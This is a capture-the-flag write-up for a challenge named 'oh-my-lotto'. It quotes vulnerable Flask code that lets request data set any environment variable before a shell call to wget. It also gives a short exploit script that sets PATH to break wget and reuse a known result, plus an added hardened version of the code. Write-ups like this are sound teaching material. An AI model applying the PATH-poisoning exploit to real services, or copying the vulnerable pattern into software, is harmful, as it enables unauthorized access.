oh-my-lotto
2022-04-23 11:29:00 【succ3】
Key point: changing an environment variable to bypass wget

MD5 brute force

import hashlib

# Search for an integer whose MD5 hex digest starts with the required prefix
for i in range(1000000000):
    a = hashlib.md5(str(i).encode('utf-8')).hexdigest()
    if a[0:6] == '0c5fbf':
        print(i)
        print(a)

The challenge comes down to three routes.

The result route returns the value the server currently holds, which is the value we have to predict.

@app.route("/result", methods=['GET'])
def result():
    if os.path.exists("/app/lotto_result.txt"):
        lotto_result = open("/app/lotto_result.txt", 'rb').read().decode()
    else:
        lotto_result = ''
    return render_template('result.html', message=lotto_result)

The forecast route is mainly used to upload a file.

@app.route("/forecast", methods=['GET', 'POST'])  # Route for uploading the forecast file
def forecast():
    message = ''
    if request.method == 'GET':
        return render_template('forecast.html')
    elif request.method == 'POST':
        if 'file' not in request.files:
            message = 'Where is your forecast?'
        file = request.files['file']
        file.save('/app/guess/forecast.txt')
        message = "OK, I get your forecast. Let's Lotto!"
        return render_template('forecast.html', message=message)

The lotto route is where the flag can be obtained: when the uploaded forecast is identical to the value drawn this round, it returns the flag.

@app.route("/lotto", methods=['GET', 'POST'])
def lotto():
    message = ''
    if request.method == 'GET':  # On GET, render the lotto page
        return render_template('lotto.html')
    elif request.method == 'POST':  # On POST, continue
        flag = os.getenv('flag')  # Read the flag from the environment; returns None if it is not set
        lotto_key = request.form.get('lotto_key') or ''
        lotto_value = request.form.get('lotto_value') or ''  # Get the form values
        try:
            lotto_key = lotto_key.upper()  # Convert lowercase letters to uppercase
        except Exception as e:
            print(e)
            message = 'Lotto Error!'
            return render_template('lotto.html', message=message)
        if safe_check(lotto_key):
            os.environ[lotto_key] = lotto_value
            try:
                # Fetch a random value from the intranet host lotto
                os.system('wget --content-disposition -N lotto')
                if os.path.exists("/app/lotto_result.txt"):  # Check whether the file exists
                    lotto_result = open("/app/lotto_result.txt", 'rb').read()  # Open and read it
                else:
                    lotto_result = 'result'  # If the file does not exist, fall back to the string 'result'
                if os.path.exists("/app/guess/forecast.txt"):  # The forecast file we uploaded
                    forecast = open("/app/guess/forecast.txt", 'rb').read()
                else:
                    forecast = 'forecast'
                if forecast == lotto_result:  # If our forecast equals the content of lotto_result.txt, return the flag
                    return flag
                else:
                    message = 'Sorry forecast failed, maybe lucky next time!'
                    return render_template('lotto.html', message=message)
            except Exception as e:
                message = 'Lotto Error!'
                return render_template('lotto.html', message=message)
        else:
            message = 'NO NO NO, JUST LOTTO!'
            return render_template('lotto.html', message=message)

There are three steps:
1. First visit the lotto page.
2. Then visit the result page to get the value it gives.
3. Set the environment variable PATH and visit the lotto page again.

Analysis:
The first two steps obtain the current value, but the value changes on the next draw, so we cannot get the flag that way. How can we keep the value constant, or change it to one we know?
The third step is what controls the random value fetched from the intranet.

Reason:
The code shows that we can control both the name and the value of an environment variable.

        if safe_check(lotto_key):
            os.environ[lotto_key] = lotto_value
            try:
                # Fetch a random value from the intranet host lotto
                os.system('wget --content-disposition -N lotto')

PATH
The PATH variable holds the list of directories that are searched for executables. If the program to be run is not in the current directory, the operating system searches the directories recorded in PATH in turn; if it finds the program in one of them, it runs it directly, provided the file has execute permission.
So if we control the PATH environment variable, the wget command can no longer be found: wget --content-disposition -N lotto reports an error and does not run, and /app/lotto_result.txt keeps the randomly generated value from the first visit.

import requests

url = "http://127.0.0.1:8880/"

def lotto(key, value):
    data = {
        "lotto_key": key,
        "lotto_value": value}
    txt = requests.post(url + "lotto", data=data).text
    print(txt)

def getResult():
    txt = requests.get(url + "result").text
    p = txt.split("<p>")[-1].split("</p>")[0]
    print(p)
    return p

lotto("", "")
result = {
    "file": getResult()}  # Use the current result as the forecast
requests.post(url + "forecast", files=result)  # Upload the forecast
lotto("PATH", "xxxx")

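The root cause described above, next to a hardened form, as an added example that is not part of the original post or the challenge source. Assumptions: dd stands in for wget so the code runs offline (like wget, it writes the result file itself), and the function names and temporary result path are hypothetical.

```python
import os, shutil, subprocess, tempfile

# Stand-in for wget (assumption): dd writes 16 fresh random bytes to the file.
FETCH_BIN = shutil.which("dd")  # absolute path pinned once at startup

def fetch_vulnerable(result_path, env_key, env_value):
    """Pattern from /lotto: request data lands in os.environ, a shell resolves
    the command through PATH, and the exit status is never checked."""
    saved = os.environ.get(env_key)
    os.environ[env_key] = env_value
    try:
        status = os.system(
            f"dd if=/dev/urandom of={result_path} bs=16 count=1 2>/dev/null")
    finally:  # restore, so this demo does not poison the rest of the process
        if saved is None:
            os.environ.pop(env_key, None)
        else:
            os.environ[env_key] = saved
    with open(result_path, "rb") as fh:
        return status, fh.read()

def fetch_hardened(result_path):
    """No request data reaches the environment: absolute binary, fixed env,
    no shell, and a failed fetch deletes the old result (fail closed)."""
    cmd = [FETCH_BIN, "if=/dev/urandom", f"of={result_path}", "bs=16", "count=1"]
    try:
        subprocess.run(cmd, env={"PATH": "/usr/bin:/bin"}, check=True,
                       stderr=subprocess.DEVNULL, timeout=10)
    except (OSError, subprocess.SubprocessError):
        if os.path.exists(result_path):
            os.remove(result_path)  # never compare against a stale draw
        raise
    with open(result_path, "rb") as fh:
        return fh.read()

def demo():
    path = os.path.join(tempfile.mkdtemp(), "lotto_result.txt")
    _, first = fetch_vulnerable(path, "LANG", "C")            # normal draw
    status, second = fetch_vulnerable(path, "PATH", "xxxx")   # lookup fails
    third = fetch_hardened(path)                              # fresh draw
    # (fetch failed, stale value reused, hardened path produced a new value)
    return status != 0, second == first, third != first

if __name__ == "__main__":
    print(demo())
```

The two properties that matter on the defensive side are that the child process gets an explicit environment rather than the inherited, request-influenced one, and that a non-zero exit status invalidates the previous result instead of silently reusing it.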
Copyright notice
This article was written by [succ3]. Please include a link to the original when reposting. Thank you.
https://yzsam.com/2022/04/202204231110505183.html